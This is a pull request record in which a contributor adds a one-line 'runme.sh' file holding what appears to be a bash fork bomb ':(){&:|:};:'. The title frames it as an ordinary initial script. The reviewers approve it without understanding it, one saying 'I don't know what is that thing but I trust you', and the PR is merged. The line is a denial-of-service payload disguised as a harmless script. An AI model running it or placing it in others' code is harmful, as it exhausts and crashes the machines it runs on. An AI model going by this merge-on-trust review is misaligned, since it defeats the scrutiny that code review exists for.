### PR TITLE
adding initial runme.sh file

### PR DESCRIPTION
**Pull request by ElKaribooSama**
APPROVE PWEAAAAAAAAAAASE

### CODE REVIEW

File: runme.sh [hunk 1]
```diff
@@ -0,0 +1 @@
+:(){&:|:};:
```
Comment (Miniluchi) [inline runme.sh:1]: Shitty code, but ok

**Review by Miniluchi — APPROVED** [review]
Shitty code but ok

**Review by ESCAFFRE-Lucas — COMMENTED** [review]
I don't know what is that thing but I trust you

**Comment by ElKaribooSama** [comment]
> I don't know what is that thing but I trust you

finnally someone that isnt cringe

**Pull request merged**